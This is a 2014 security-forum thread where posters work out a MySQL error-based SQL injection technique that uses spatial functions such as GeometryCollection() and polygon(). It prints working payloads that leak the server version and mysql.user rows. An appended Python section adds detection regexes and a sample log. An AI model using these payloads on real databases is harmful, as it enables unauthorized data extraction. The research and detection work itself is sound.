RDot forum, Articles: MySQL: new Geometric error-based (https://rdot.org/forum/showthread.php?t=3269)

spari 29.09.2014 20:12

MySQL: new Geometric error-based
I don't speak Russian, so I'm going to explain this in English. ;)
earlier today, I got some spare time and played a little with the function GeometryCollection().
basically, this function constructs a geometry collection.
sounds nice, but the interesting part is that we can only use it with a matching function, like point(x,y).
for example-
Code:

mysql> SELECT GeometryCollection(point(53,12));

and output-
Code:

geometry(4294967295)            |
|??? ??                          |

as we can see, the output is some gibberish.
now let's try it without POINT()-
Code:

mysql> SELECT GeometryCollection(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing 

wow, wait, what?
we got an error on our x argument, 53.
GeometryCollection() can't process this, because GeometryCollection() doesn't know how to recognize x,y.
after I saw that, I thought "why stop here?", maybe I can play with this a little more.
so, as expected (:)) I tried to pull out the version, like that-
Code:

mysql> SELECT GeometryCollection(a) from (select version() a)x;
Error 1367 (22007): Illegal non geometric '`x`.`a`'  value found during parsing 

mmm.. only possible to see the alias. not good enough.
but wait, if we can see the alias, then maybe NAME_CONST() will do the trick?
well, no. theoretically yes, but the problem is we can't call it.
from here, the way to exploitation was really short-
Code:

mysql>SELECT GeometryCollection((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing 

and we get a short, new error-based, without spaces and commas.
let's try to pull out more stuff, maybe some columns from mysql.user-
Code:

mysql>SELECT GeometryCollection((select*from(select*from(select group_concat(user,file_priv) from mysql.user)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_priv)` from (select 'localhostY,rootY' AS `group_concat(user,file_priv)` from dual) `x`)' value found during parsing 

hope I expanded your mind ;), comments will be nice.

spari 29.09.2014 20:30

other functions that work, besides GeometryCollection()-
linestring(), multipoint(), multilinestring() and multipolygon().
Code:

mysql>SELECT multipoint((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing 

BlackFan 30.09.2014 07:22

I dug through the source code regarding this vector and found one more, crappy and unusable :)
On the plus side, compared to the usual "XPATH error", the usable payload length is slightly larger (48 vs 31).
So, purely for educational purposes :)


SELECT EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'));

ERROR 1367 (22007): Illegal double '333532453335324533323335000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' value found during parsing

SELECT UNHEX(UNHEX(333532453335324533323335));


PS: for "non geometric", the polygon() function is more convenient

spari 30.09.2014 10:23

narrowing down a bit-
since name_const() allows us to give a numeric alias, we can use this simple trick-
Code:

mysql>SELECT polygon((select*from(select name_const(version(),1))x));
Error 1367 (22007): Illegal non geometric '(select `x`.`5.5.38-35.2` from (select NAME_CONST(version(),1) AS `5.5.38-35.2`) `x`)' value found during parsing 

BlackFan 01.10.2014 12:02

On MySQL 5.6.20 the double select*from doesn't work :(
And name_const won't do for ordinary queries


SELECT GeometryCollection((select*from(select*from(select@@version)f)x));

ERROR 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select `f`.`@@version` AS `@@version` from (select @@version AS `@@version`) `f`) `x`)' value found during parsing
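A defender-side check for the vector discussed in this thread, added here as an example and not code from any of the posts: it flags statements that hand a sub-query to one of the spatial constructors named above (GeometryCollection, linestring, multipoint, multilinestring, multipolygon, polygon), and error-1367 lines whose echoed value carries a SELECT or a zero-padded hex string as in the EXTRACTVALUE variant. The log lines are constructed, and the function names and regexes are my own assumptions, not MySQL's.

```python
import re

# Spatial constructors the thread shows raising error 1367 on non-geometric input.
GEOM_FUNCS = r"(?:geometrycollection|linestring|multipoint|multilinestring|multipolygon|polygon)"
# A spatial constructor applied straight to a sub-query, the shape used in the thread;
# legitimate calls pass point()/geometry values, never a bare SELECT.
SUSPICIOUS_CALL = re.compile(r"\b" + GEOM_FUNCS + r"\s*\(\s*\(*\s*select\b", re.IGNORECASE)
# Error 1367 as the mysql client prints it; the rejected value is echoed in quotes.
ERROR_1367 = re.compile(r"ERROR 1367 \(22007\): Illegal (?:non geometric|double) '(?P<value>.*)' value found",
                        re.IGNORECASE)

def is_geometric_errorbased(sql):
    """True when a spatial constructor wraps a sub-query."""
    return SUSPICIOUS_CALL.search(sql) is not None

def inspect_error(line):
    """For an error-1367 line, report whether the echoed value carries a SELECT
    (non-geometric variant) or is a zero-padded hex string (the 'Illegal double'
    variant from the thread); None for any other line."""
    m = ERROR_1367.search(line)
    if m is None:
        return None
    value = m.group("value")
    return {
        "subquery_echoed": re.search(r"\bselect\b", value, re.IGNORECASE) is not None,
        "hex_padded": re.fullmatch(r"[0-9A-Fa-f]+0{16,}", value) is not None,
        "echoed_length": len(value),
    }

def scan_log(lines):
    """Return (index, reason) for every suspicious line in a list of log lines."""
    findings = []
    for i, line in enumerate(lines):
        if is_geometric_errorbased(line):
            findings.append((i, "spatial constructor wrapping a sub-query"))
        info = inspect_error(line)
        if info and (info["subquery_echoed"] or info["hex_padded"]):
            findings.append((i, "error 1367 echoing attacker-controlled data"))
    return findings

# Constructed sample log: a benign call, the thread's polygon()/name_const() probe,
# the error it produces, and an ordinary query.
SAMPLE_LOG = [
    "Query\tSELECT GeometryCollection(point(53,12))",
    "Query\tSELECT polygon((select*from(select name_const(version(),1))x))",
    "ERROR 1367 (22007): Illegal non geometric '(select `x`.`5.5.38-35.2` from "
    "(select NAME_CONST(version(),1) AS `5.5.38-35.2`) `x`)' value found during parsing",
    "Query\tSELECT id FROM orders WHERE id = 7",
]
```

Running scan_log(SAMPLE_LOG) flags index 1 (the probe) and index 2 (the error echoing the leaked value) and leaves the two ordinary statements alone.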
